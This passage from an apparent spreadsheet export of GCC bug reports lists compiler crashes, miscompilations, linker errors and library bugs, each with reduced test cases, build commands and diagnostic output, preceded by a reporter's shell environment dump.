EPID=2618
EROOT=/usr/share/enlightenment
ETHEME=/usr/share/enlightenment/themes/BrushedMetal-Tigert
EUID=1000
EVERSION=0.16.5
GDMSESSION=Debian
GDM_LANG=C
GROUPS=()
HISTFILE=/home/johanc/.bash_history
HISTFILESIZE=500
HISTSIZE=500
HOME=/home/johanc
HOSTNAME=r2d2
HOSTTYPE=i386
HTTP_PROXY=wwwproxy.his.se
IFS=' 
'
LANG=C
LINES=67
LOGNAME=root
LS_COLORS='no=00:fi=00:di=0134:ln=0136:pi=4033:so=0135:do=0135:bd=403301:cd=403301:or=403101:ex=0132:*.tar=0131:
*.tgz=0131:*.arj=0131:*.taz=0131:*.lzh=0131:*.zip=0131:*.z=0131:*.Z=0131:*.gz=0131:*.bz2=0131:*.deb=0131:*.rpm=013
1:*.jar=0131:*.jpg=0135:*.png=0135:*.gif=0135:*.bmp=0135:*.pbm=0135:*.pgm=0135:*.ppm=0135:*.tga=0135:*.xbm=0135:*.x
pm=0135:*.tif=0135:*.png=0135:*.mpg=0135:*.avi=0135:*.fli=0135:*.gl=0135:*.dl=0135:'
LS_OPTIONS=--color=auto
MACHTYPE=i386-pc-linux-gnu
MAILCHECK=60
OLDPWD=/home/johanc/khepera
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:./:/home/johanc/bin:/home/johanc/legOS:/home/johanc/legOS/util:/hom
e/johanc/legOS/util
PIPESTATUS=([0]=0)
PPID=25588
PS1='\h:\w\$ '
PS2='&gt; '
PS4='+ '
PWD=/home/johanc/khepera/optann
SHELL=/bin/bash
SHELLOPTS=braceexpand:hashall:histexpand:monitor:history:interactive-comments:emacs
SHLVL=4
SOCKS_SERVER=titus.ida.his.se:1080
SSH_AGENT_PID=2658
SSH_AUTH_SOCK=/tmp/ssh-XXqzKwe2/agent.2618
TERM=xterm
UID=1000
USER=root
USERNAME=root
WINDOWID=71303182
XAUTHORITY=/tmp/.gdmnH6Vqf
_=-v
ftp_proxy=http://wwwproxy.his.se/
gopher_proxy=http://wwwproxy.his.se/
http_proxy=http://wwwproxy.his.se/
socks_server=titus.ida.his.se:1080
wais_proxy=http://wwwproxy.his.se/
How-To-Repeat:
g++ -c environ.cc -O3 -g2 -L./lib -Wall -I/pub/sun/include  -L./trivialgfx/lib -I./trivialgfx/include `gtk-config --cflags` -DGUI -DTARGET_X -o environg.o</t>
  </si>
  <si>
    <t>johanc</t>
  </si>
  <si>
    <t>GCC-1693</t>
  </si>
  <si>
    <t>sstream causes linkage error</t>
  </si>
  <si>
    <t>ld32: ERROR   33 : Unresolved text symbol std::basic_stringbuf std::allocator &gt;::seekpos(std::fpos std::_Ios_Openmode) -- 1st referenced by /var/tmp/ccEIphge.o.
Release:
recent
Environment:
linux glibc 2.2.1 / kernel 2.4.0
IRIX 6.5.9
How-To-Repeat:
try to compile and link:
#include 
using std::string
#include 
using std::istringstream
int main() {
  string Input1(  word1 word2\n   word3)
  istringstream Inp(Input1)
  string S
  Inp &gt;&gt; S  // ignores white chars
}</t>
  </si>
  <si>
    <t>jarausch</t>
  </si>
  <si>
    <t>GCC-1560</t>
  </si>
  <si>
    <t>segmentation fault of a program throwing an exception when compiled with option -fomit-frame-pointer</t>
  </si>
  <si>
    <t>the attached piece of code compiles and links correctly with
or without option -fomit-frame-pointer but produces a 
segmentation fault when compiled with -fomit-frame-pointer.
Release:
2.95.2
Environment:
Debian/Linux potato 2.2r2 
as version 2.9.5
ld version 2.9.5
libstdc++ version 2.10
How-To-Repeat:
g++ -fomit-frame-pointer -o exception_bug exception_bug.cc</t>
  </si>
  <si>
    <t>gilles.chanteperdrix</t>
  </si>
  <si>
    <t>GCC-78396</t>
  </si>
  <si>
    <t>[7 regression] gcc.dg/vect/bb-slp-cond-1.c FAILs after fix for PR77848</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/bugzilla/show_bug.cgi?id=77848 identified a case where if-conversion modified a loop that was not subsequently vectorized with the resulting code being significantly worse than without if-conversion.  Since if-conversion has no cost model this was resolved by requiring loop versioning for all if-converted loops unless if-conversion was specifically requested.
There was one bit of fallout from this as gcc.dg/vect/bb-slp-cond-1.c now fails.  This test expected if-converted input that the BB vectorizer would be able to handle after the loop vectorizer failed on it.
There are two ways this can be resolved:
 - Improve the data dependence analysis in the loop vectorizer or
 - Teach the basic block vectorizer to if-convert PHIs in otherwise straight-line code.</t>
  </si>
  <si>
    <t>GCC-17358</t>
  </si>
  <si>
    <t>[4.0 Regression] infinite loop due to incorrect updating of the dominator tree</t>
  </si>
  <si>
    <t>// Reduced from vorbis-tools 1.0.1
// 
// gcc -O vcut.i
//
// Goes into an infinite loop after thread_jumps mis-updates
// the dominator information in the cfg cleanup called from 
// execute_cleanup_cfg_post_optimize.
// Happens on many targets.
extern int clobber_k (int *)
extern int barrier (void)
int process_second_stream(void)
{
  int k
  int i = 0 j = 0 result
  clobber_k (
  while(barrier ())
  while(!j)
    {
      while(!j)
        {
          result=barrier ()
          if (result == 0)
            break
          else if(result==-1)
            barrier ()
          else
            {
              if(barrier ())
                j=1
              while(1)
                {
                  result = barrier ()
                  if(result==0)
                    break
                  k = i++
                }
            }
        }
      if(!j &amp;&amp; barier ())
        j=1
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-18960</t>
  </si>
  <si>
    <t>[4.0 only] compiler segfault on shifting character array constants</t>
  </si>
  <si>
    <t>$ cat eoshift-3.f90
  print *eoshift((/'h' 'e' 'l' 'l' 'o'/) 3)
end
$ gfortran eoshift-3.f90
eoshift-3.f90: In function 'MAIN__':
eoshift-3.f90:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -v
Reading specs from /home/zfkts/lib/gcc/ia64-unknown-linux-gnu/4.0.0/specs
Configured with: ../gcc-4.0-20041205/configure --prefix=/home/zfkts
--enable-languages=cc++f95 --disable-shared
Thread model: posix
gcc version 4.0.0 20041205 (experimental)</t>
  </si>
  <si>
    <t>GCC-15383</t>
  </si>
  <si>
    <t>__float128 function name is used for long double</t>
  </si>
  <si>
    <t>GCC-65914</t>
  </si>
  <si>
    <t>[6 Regression] error: unrecognizable insn</t>
  </si>
  <si>
    <t>Running the Boost testsuite on ppc64le shows:
trippels@gcc2-power8 status % g++ -O3 -c -std=c++14 unordered_set_test.ii
../libs/intrusive/test/unordered_set_test.cpp: In static member function â€˜static void test_unordered_set::test_rehash(std::vector bool CacheBegin = false bool CompareHash = false bool Incremental = true typename ValueTraits::value_type = boost::intrusive::testvalue false&gt; boost::move_detail::true_ = boost::move_detail::bool_]â€™:
../libs/intrusive/test/unordered_set_test.cpp:448:1: error: unrecognizable insn:
 }
 ^
(insn 72 71 73 2 (set (reg:V2DI 540 [ vect_cst_.26426 ])
        (vec_concat:V2DI (reg/f:DI 150 virtual-stack-vars [ D.668853 ])
            (reg:DI 541 [ D.668853 ]))) ../boost/intrusive/detail/slist_node.hpp:55 -1
     (nil))
../libs/intrusive/test/unordered_set_test.cpp:448:1: internal compiler error: in extract_insn at recog.c:2341
0x109a7e33 _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../gcc/gcc/rtl-error.c:110
0x109a7eaf _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../gcc/gcc/rtl-error.c:118
0x1096d767 extract_insn(rtx_insn*)
        ../../gcc/gcc/recog.c:2341
0x106c98bb instantiate_virtual_regs_in_insn
        ../../gcc/gcc/function.c:1598
0x106c98bb instantiate_virtual_regs
        ../../gcc/gcc/function.c:1966
0x106c98bb execute
        ../../gcc/gcc/function.c:2015
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Reducing...</t>
  </si>
  <si>
    <t>GCC-62173</t>
  </si>
  <si>
    <t>[5/6 Regression] 64bit Arch can't ivopt while 32bit Arch can</t>
  </si>
  <si>
    <t>void bar(int i) {
  char A[10]
  int d = 0
  while (i &gt; 0)
    A[d++] = i--
  while (d &gt; 0)
    foo(A[d--])
}
Compile this function at -O3 with the last good revision r213487 and with the first bad revision r213488 [AArch64] Improve TARGET_LEGITIMIZE_ADDRESS_P hook and diffing:
--- good.s	2014-08-18 10:56:42.542867000 -0500
+++ bad.s	2014-08-18 10:56:42.504090000 -0500
@@ -834 +833 @@
 	stp	x29 x30 [sp -48]!
 	cmp	w0 wzr
 	add	x29 sp 0
-	stp	x19 x20 [sp 16]
+	str	x19 [sp 16]
 	ble	.L1
 	strb	w0 [x29 32]
 	subs	w19 w0 #1
-	add	x20 x29 32
 	beq	.L4
 	strb	w19 [x29 33]
 	subs	w1 w0 #2
 	beq	.L4
-	strb	w1 [x20 2]
+	strb	w1 [x29 34]
 	subs	w1 w0 #3
 	beq	.L4
-	strb	w1 [x20 3]
+	strb	w1 [x29 35]
 	subs	w1 w0 #4
 	beq	.L4
-	strb	w1 [x20 4]
+	strb	w1 [x29 36]
 	subs	w1 w0 #5
 	beq	.L4
-	strb	w1 [x20 5]
+	strb	w1 [x29 37]
 	subs	w1 w0 #6
 	beq	.L4
-	strb	w1 [x20 6]
+	strb	w1 [x29 38]
 	subs	w1 w0 #7
 	beq	.L4
-	strb	w1 [x20 7]
+	strb	w1 [x29 39]
 	subs	w1 w0 #8
 	beq	.L4
-	strb	w1 [x20 8]
+	strb	w1 [x29 40]
 	subs	w1 w0 #9
 	beq	.L4
 	strb	w1 [x29 41]
@@ -4314 +4216 @@
 .L35:
 	sub	w19 w19 #1
 .L4:
-	ldrb	w0 [x20 w0 sxtw]
+	add	x1 x29 48
+	add	x0 x1 x0 sxtw
+	ldrb	w0 [x0 -16]
 	bl	foo
 	mov	w0 w19
 	cbnz	w19 .L35
 .L1:
-	ldp	x19 x20 [sp 16]
+	ldr	x19 [sp 16]
 	ldp	x29 x30 [sp] 48
 	ret
 	.size	bar .-bar
The problem is that gcc now generates an addressing mode that requires two more add instructions in the second loop:
-	ldrb	w0 [x20 w0 sxtw]
+	add	x1 x29 48
+	add	x0 x1 x0 sxtw
+	ldrb	w0 [x0 -16]</t>
  </si>
  <si>
    <t>GCC-69595</t>
  </si>
  <si>
    <t>[6 Regression] Bogus -Warray-bound warning due to missed optimization</t>
  </si>
  <si>
    <t>char *y
void foo (int sysnum)
{
  static char *x[] = {}
  int nsyscalls = sizeof x / sizeof x[0]
  if (sysnum = nsyscalls)
    return
  else
    y = x[sysnum]
}
warns at -O2 -Warray-bounds because we don't optimize sysnum = 0 to true before VRP1.  We optimize this only in reassoc.
VRP warns as 'sysnum' in the x[sysnum] path is UNDEFINED.</t>
  </si>
  <si>
    <t>GCC-26726</t>
  </si>
  <si>
    <t>-fivopts producing out of bounds array refs</t>
  </si>
  <si>
    <t>=== Cut ===
struct
QValueList
{
    QValueList()
    {
        sh = new int
    }
   QValueList
   int* sh
}
void
queryIconsByContext()
{
    QValueList iconlist[8]
    QValueList iconlistResult
    for (int i=0 i&lt;8 i++)
            iconlistResult+=iconlist[i]
}
=== Cut ===
g++ -O2 
produces this SSA form after ivopts branch:
...
  ivtmp.38_37 = ivtmp.38_1 + 4B
  if (ivtmp.38_37 !=  else goto 
...
taking address of the 10th iconlist element is out of bounds access.</t>
  </si>
  <si>
    <t>GCC-25551</t>
  </si>
  <si>
    <t>[4.0 Regression] gcov incorrect count for lone return in block</t>
  </si>
  <si>
    <t xml:space="preserve">
	gcov incorrectly shows that a lone return statement inside a block
	has executed when in fact it has not
Environment:
System: Linux mercury.acucorp.com 2.4.18-27.8.0smp #1 SMP Fri Mar 14 07:13:13 EST 2003 i686 athlon i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-4.0.2/configure --prefix=/usr/local/gcc-4.0.2
How-To-Repeat:
	Compile the following program run it then run gcov on the source:
	gcc -fprofile-arcs -ftest-coverage -o foo foo.c
	./foo
	gcov -b foo.c
------- foo.c:
#include 
static void
foo(int num)
{
    if (num &lt;= 1) {
	/* uncomment following line to get correct results */
//	printf(num &lt;= 1\n)
	/* this return is never executed but gcov says it is */
	return
    }
    printf(num &gt; 1\n)
} /* foo */
int
main(void)
{
    foo(3)
    foo(3)
    foo(3)
    foo(3)
    foo(3)
    foo(3)
    foo(3)
    return 0
}
------- foo.c.gcov:
        -:    0:Source:foo.c
        -:    0:Graph:foo.gcno
        -:    0:Data:foo.gcda
        -:    0:Runs:1
        -:    0:Programs:1
        -:    1:#include 
        -:    2:
        -:    3:static void
        -:    4:foo(int num)
function foo called 7 returned 100% blocks executed 100%
        7:    5:{
        7:    6:    if (num &lt;= 1) {
branch  0 taken 100% (fallthrough)
branch  1 taken 0%
        -:    7:	/* uncomment following line to get correct results */
        -:    8://	printf(num &lt;= 1\n)
        -:    9:
        -:   10:	/* this return is never executed but gcov says it is */
        7:   11:	return
        -:   12:    }
        -:   13:
        7:   14:    printf(num &gt; 1\n)
call    0 returned 100%
        -:   15:} /* foo */
        -:   16:
        -:   17:
        -:   18:int
        -:   19:main(void)
function main called 1 returned 100% blocks executed 100%
        1:   20:{
        1:   21:    foo(3)
call    0 returned 100%
        1:   22:    foo(3)
call    0 returned 100%
        1:   23:    foo(3)
call    0 returned 100%
        1:   24:    foo(3)
call    0 returned 100%
        1:   25:    foo(3)
call    0 returned 100%
        1:   26:    foo(3)
call    0 returned 100%
        1:   27:    foo(3)
call    0 returned 100%
        1:   28:    return 0
        -:   29:}</t>
  </si>
  <si>
    <t>GCC-83828</t>
  </si>
  <si>
    <t>FAIL: gcc.target/i386/avx512vpopcntdqvl-vpopcntq-1.c execution test</t>
  </si>
  <si>
    <t>On Skylake server with AVX512 I got:
FAIL: gcc.target/i386/avx512vpopcntdqvl-vpopcntd-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdqvl-vpopcntd-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdqvl-vpopcntq-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdqvl-vpopcntq-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdq-vpopcntd-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdq-vpopcntd-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdq-vpopcntq-1.c execution test
FAIL: gcc.target/i386/avx512vpopcntdq-vpopcntq-1.c execution test</t>
  </si>
  <si>
    <t>GCC-45354</t>
  </si>
  <si>
    <t>[4.6 regression] ICE with -fselective-scheduling and -freorder-blocks-and-partition</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O -fschedule-insns -fselective-scheduling -freorder-blocks-and-partition -fprofile-generate gcc.dg/tree-prof/update-cunroll-2.c
$ rm *.gcda
$ ./a.out
$ gcc -O -fschedule-insns -fselective-scheduling -freorder-blocks-and-partition -fprofile-use gcc.dg/tree-prof/update-cunroll-2.c
gcc.dg/tree-prof/update-cunroll-2.c: In function 't':
gcc.dg/tree-prof/update-cunroll-2.c:12:1: error: fallthru edge crosses section boundary (bb 6)
gcc.dg/tree-prof/update-cunroll-2.c:12:1: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I wasn't able to further reduce the testcase.
Tested revisions:
r163371 - crash</t>
  </si>
  <si>
    <t>GCC-32438</t>
  </si>
  <si>
    <t>Compile fails on compilation of compile_options.o</t>
  </si>
  <si>
    <t>Configuration invoked with: 
../gcc-4.1.2/configure --enable-languages=cc++fortran
make
Failing lines show:
../gcc -I../../../gcc-4.1.2/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -O2 -g -O2 -c ../../../gcc-4.1.2/libgfortran/runtime/compile_options.c -o compile_options.o &gt;/dev/null 2&gt;&amp;1
make[3]: *** [compile_options.lo] Error 1
make[2]: *** [all] Error 2
make[1]: *** [all-target-libgfortran] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>danp57</t>
  </si>
  <si>
    <t>GCC-50587</t>
  </si>
  <si>
    <t>ICE init_range_entry at tree-ssa-reassoc.c:1698 caused by recent change</t>
  </si>
  <si>
    <t>Jakub your recent change
        PR tree-optimization/46309
        * fold-const.c (make_range merge_ranges): Remove prototypes.
        (make_range_step): New function.
        (make_range): Use it.
        * tree.h (make_range_step): New prototypes.
        * Makefile.in (tree-ssa-reassoc.o): Depend on $(DIAGNOSTIC_CORE_H).
        * tree-ssa-reassoc.c: Include diagnostic-core.h.
        (struct range_entry): New type.
        (init_range_entry range_entry_cmp update_range_test
        optimize_range_tests): New functions.
        (reassociate_bb): Call optimize_range_tests.
        * gcc.dg/pr46309.c: New test.
breaks my LTO kernel builds.
I get a lot of
internal compiler error: in init_range_entry at tree-ssa-reassoc.c:1698
in different files. With the patch reverted things are fine</t>
  </si>
  <si>
    <t>GCC-59047</t>
  </si>
  <si>
    <t>[4.9 Regression] wrong code for bitfields at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following testcase on x86_64-linux-gnu at -O3 (in both 32-bit and 64-bit modes). 
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --disable-werror --enable-checking=release --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20131108 (experimental) [trunk revision 204560] (GCC) 
$ 
$ gcc-trunk -O2 small.c a.out
1
$ gcc-4.8.2 -O3 small.c a.out
1
$ 
$ gcc-trunk -O3 small.c a.out
0
$ 
--------------------------------------
int printf (const char * ...)
struct
{
  int f0
  int f1:1
  int f2:2
} a = {0 0 1}
int b c *d e f
int
fn1 ()
{
  for ( b &lt; 1 ++b)
    {
      for (e = 0 e &lt; 1 e = 1)
	{
	  int **g = 
	  *g = 
	} 
      *d = 0
      f = a.f1
      if (f)
	return 0
    }
  return 0
}
int
main ()
{
  fn1 ()
  printf (%d\n b)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-30184</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/torture/builtin-sin-mpfr-1.c  -O0  (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/torture/builtin-sin-mpfr-1.c   -O0   -fno-sh
ow-column  -lm   -o builtin-sin-mpfr-1.exe    (timeout = 300)
/usr/ccs/bin/ld: Unsatisfied symbols:
   link_error (first referenced in /var/tmp//ccgzmQTI.o) (code)
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/usr/ccs/bin/ld: Unsatisfied symbols:
   link_error (first referenced in /var/tmp//ccgzmQTI.o) (code)
collect2: ld returned 1 exit status
FAIL: gcc.dg/torture/builtin-sin-mpfr-1.c  -O0  (test for excess errors)
Excess errors:
/usr/ccs/bin/ld: Unsatisfied symbols:
   link_error (first referenced in /var/tmp//ccgzmQTI.o) (code)</t>
  </si>
  <si>
    <t>GCC-34002</t>
  </si>
  <si>
    <t>ICE with constant intrinsic array specs</t>
  </si>
  <si>
    <t>[tjf@fkpc167 CompTest]$ cat isotope.f90 
program fred
implicit none
integerdimension(3)parameter::MaxJ=2
integerdimension(maxval(MaxJ))::N
integer::J
N=0
do J=1maxval(MaxJ)
  write(**)N(J)
enddo
end
[tjf@fkpc167 CompTest]$ gfortran -v -c isotope.f90
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --disable-multilib --enable-languages=cfortran
Thread model: posix
gcc version 4.2.2
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.2.2/f951 isotope.f90 -quiet -dumpbase isotope.f90 -mtune=generic -auxbase isotope -version -I /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.2.2/finclude -o /tmp/ccS94960.s
GNU F95 version 4.2.2 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.2.2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
isotope.f90: In function â€˜MAIN__â€™:
isotope.f90:4: internal compiler error: in gfc_conv_intrinsic_minmaxval at fortran/trans-intrinsic.c:2119
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I do recall running into some sort of problems w.r.t. standards conformance with this type of intrinsic in array specifications in the past (the details allude me) so I'm not certain this is legal.  However with a similar code (without the loop that seems to be causing the problem) I can't get gfortran to produce an error or warning with any combination of -std and -pedantic and size(N) returns the expected value.  So if it's not legal code there's another bug to go with the ICE!
(*sigh* Another problem of not having standards documents readily available without forking out cash...  or is there a reliable Fortran specification living on the web somewhere?)</t>
  </si>
  <si>
    <t>tjf</t>
  </si>
  <si>
    <t>GCC-9632</t>
  </si>
  <si>
    <t>'If' statement evaluates differently depending on optimization (-O vs -g)</t>
  </si>
  <si>
    <t>The attached file contains a code snippet that can be compiled and run. The 'if' test fails when the code is compiled with 
-O and works as expected when compiled with -g.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)
Environment:
RedHat 7.2
i386
gcc version 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)
How-To-Repeat:
Refer to attachment. When compiled with -g flag wire_draw
is called as expected. When compiled with -O wire_draw is
not called.</t>
  </si>
  <si>
    <t>GCC-65404</t>
  </si>
  <si>
    <t>cgo tool on powerpc-linux-gnu maybe incomplete</t>
  </si>
  <si>
    <t>cgo tool on powerpc-linux-gnu maybe incomplete
the symptom noted at https://launchpad.net/bugs/1431032
shows an error:
dist/src/github.com/lxc/lxd/shared/container.go:11:2: C source files not allowed when not using cgo: sqlite3-binding.c
another not yet implemented issue is the support for PPC relocations reported as
https://github.com/golang/go/issues/10118</t>
  </si>
  <si>
    <t>GCC-6526</t>
  </si>
  <si>
    <t>[SH4] sdivsi3_i4 can clobber xd0/xd2</t>
  </si>
  <si>
    <t>When using the -m4-single-only version of libgcc the sdivsi3_i4 implementation uses dr0 and dr2 to perform the division.
This is fine in theory however it also forcefully overwrites the fpscr register including the FR bit.
This means that if FR was previously 1 the registers clobbered will not be those that the caller considers dr0 and dr2
but rather xd0 and xd2.  This is harmful to programs making use of the XMTRX.
Other libgcc functions may be affected as well.
Release:
3.0.4 3.1 20020325
Environment:
Host: SunOS continuity 5.8 Generic_108528-10 sun4m sparc SUNWSPARCstation-10
Target: sh-elf</t>
  </si>
  <si>
    <t>GCC-77288</t>
  </si>
  <si>
    <t>Std::experimental::optional::operator= implementation is broken in gcc 6.1</t>
  </si>
  <si>
    <t>Created attachment 39470
Unit tests triggering bug in operator=
0. Gcc version.
./gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/6.1.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc-multilib/src/gcc/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 6.1.1 20160707 (GCC) 
1. Issue.
C++ code snippet:
    std::experimental::optional&gt; nested_element
    std::experimental::optional element = {}
    nested_element = element
    assert(bool(nested_element))
In above snippet assertion passes for gcc 5.1 but fails for gcc 6.1. 
Analogous code passes with Boost.Optional as well.
From http://en.cppreference.com/w/cpp/experimental/optional:
The optional object (of type T) contains a value in the following conditions:
 -   The object is initialized with a value of type T (...)
so nested_element should contain a value which means operator= implementation in gcc 6.1 is broken.
2. Analysis
According to http://en.cppreference.com/w/cpp/experimental/optional/operator%3D there are 4 overloads of optional::operator=. 
We are interested in 2 versions here:
[2] optional
[4] template
optional
Let's back to our problematic expression:
nested_element = element
The root cause of problem is that in gcc 6.1 case version [2] is called but in gcc 5.1 and Boost.Optional another version is called - [4] one.
Looking deeper on broken std::experimental::optional::operator= [4] implementation there is:
      template&lt;typename _Up
               enable_if_t&lt;__and_&lt;
			   __not_&gt;
			   __not_&gt;&gt;::value
			 bool&gt; = true&gt;
        optional&amp;
        operator=(_Up&amp;&amp; __u)
{
   ...
}
which means overload resolution ommits this candidate because of occurence following expression in enable_if body:
__not_&gt; 
After substitution failure another overload candidate (version [2]) is choosen at compilation level:
  template&lt;typename _Up
               enable_if_t&lt;__and_&lt;
		 __not_&gt;&gt;::value
			   bool&gt; = true&gt;
        optional&amp;
        operator=(const optional&amp; __u)
        {
	    if (__u)
            {
              	...
            }
            else
            {
                this-&gt;_M_reset()
            }
            return *this
	}
In runtime during nested_element = element expression evaluation flow enters to operator=(const optional&amp; __u) 
and after that to this-&gt;_M_reset() because __u is nullopt. Now it's clear that this-&gt;_M_engaged field is not set and finally
bool(nested_element) returns _M_engaged content which is false.
3. Solution
As we saw version [2] of operator= is not ready for handling assignment when _Tp (type of this) is nested optional.
IMO the best what we can is forcing overload resoultion to choose version [4] in such case as it was done in gcc 5.1 implementation.
Basing on gcc 5.1 implementation we can relax rules for overload resoultion for operator= [4] version.
It's enaugh to replace is_optional trait by decay trait in enable_if_t from: 
__not_&gt;&gt;::value
to:
is_same _Tp&gt;&gt;::value
Now behaviour is the same as in gcc 5.1 - operator=(_Up&amp;&amp; __u) is chosen in 2 situations:
1. _Up is NOT optional
2. _Up is optional AND _Up is same as _Tp modulo cv-qualifiers references etc.
I prepared impl-fix.patch for gcc 6.1 containing above change. After applying this patch code snippet from beginning of my email is fixed and assertion pass.
4. Tests
Unfotunately existing Libstdc++-v3 unit tests are not able to detect bug I describe here. That's why I prepared another patch - extra-tests.patch. 
This patch just add 2 simple tests in form of extra 7.cc file under libstdc++-v3/testsuite/experimental/optional/assignment/ path.
With those patches following workflow is recommended - apply extra-tests.patch and run all tests. 
Only unit tests from 7.cc should fail. After that please apply impl-fix.patch and run all unit tests again. Now everything should pass.
I believe that's all. Anyway if I missed something please ask me.
Regards
Dawid</t>
  </si>
  <si>
    <t>dawid_jurek</t>
  </si>
  <si>
    <t>GCC-3498</t>
  </si>
  <si>
    <t>gcc3.0.1 ICE</t>
  </si>
  <si>
    <t>capi.c: In function `capi_ioctl':
capi.c:1037: Unrecognizable insn:
(insn/i 1228 3347 3344 (parallel[ 
            (set (reg:SI 6 ebp)
                (asm_operands:SI (addl %3%1  sbbl %0%0 cmpl %1%4 sbbl $0%0) (=&amp;r) 0[ 
                        (reg/v:SI 1 edx [280])
                        (mem:SI (plus:SI (reg/f:SI 6 ebp)
                                (const_int -116 [0xffffff8c])) 0)
                        (mem/s:SI (plus:SI (reg:SI 0 eax [288])
                                (const_int 12 [0xc])) 0)
                    ] 
                    [ 
                        (asm_input:SI (1))
                        (asm_input:SI (g))
                        (asm_input:SI (g))
                    ]  (/usr/src/RPM/BUILD/linux/include/asm/uaccess.h) 545))
            (set (reg/v:SI 1 edx [280])
                (asm_operands:SI (addl %3%1  sbbl %0%0 cmpl %1%4 sbbl $0%0) (=r) 1[ 
                        (reg/v:SI 1 edx [280])
                        (mem:SI (plus:SI (reg/f:SI 6 ebp)
                                (const_int -116 [0xffffff8c])) 0)
                        (mem/s:SI (plus:SI (reg:SI 0 eax [288])
                                (const_int 12 [0xc])) 0)
                    ] 
                    [ 
                        (asm_input:SI (1))
                        (asm_input:SI (g))
                        (asm_input:SI (g))
                    ]  (/usr/src/RPM/BUILD/linux/include/asm/uaccess.h) 545))
            (clobber (reg:QI 19 dirflag))
            (clobber (reg:QI 18 fpsr))
            (clobber (reg:QI 17 flags))
        ] ) -1 (insn_list 1214 (insn_list 1221 (nil)))
    (nil))
capi.c:1037: Internal compiler error in reload_cse_simplify_operands at reload1.c:8355
Release:
Reading specs from /usr/lib/gcc-lib/athlon-mandrake-linux/3.0.1/specs Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-l
Environment:
x86 (athlon) - linux (2.4.5)
How-To-Repeat:
gcc -c capi.i -Wall -Wstrict-prototypes -O2 -fno-strict-aliasing -fomit-frame-pointer -mpreferred-stack-boundary=2 -march=athlon</t>
  </si>
  <si>
    <t>bilgili</t>
  </si>
  <si>
    <t>GCC-63698</t>
  </si>
  <si>
    <t>[5 Regression] std::set leaks nodes on assignment</t>
  </si>
  <si>
    <t>Compiling a project of mine with the latest gcc-snapshot distributed by Debian (g++ (Debian 20141016-1) 5.0.0 20141016 (experimental) [trunk revision 216349]) I started to get memory leaks.
I reduced the problem to this small scenario:
% cat foo.cc
#include 
int main()
{
  std::set v{21}   // The order of 2 and 1 is important.
  std::set w{654}
  v = w
  return v.size()
}
% g++ -std=c++11 foo.cc -g -Wall
% valgrind --leak-check=yes -q ./a.out
==30757== 40 bytes in 1 blocks are definitely lost in loss record 1 of 1
==30757==    at 0x4C29180: operator new(unsigned long) (vg_replace_malloc.c:324)
==30757==    by 0x40277D: __gnu_cxx::new_allocator &gt;::allocate(unsigned long void const*) (new_allocator.h:104)
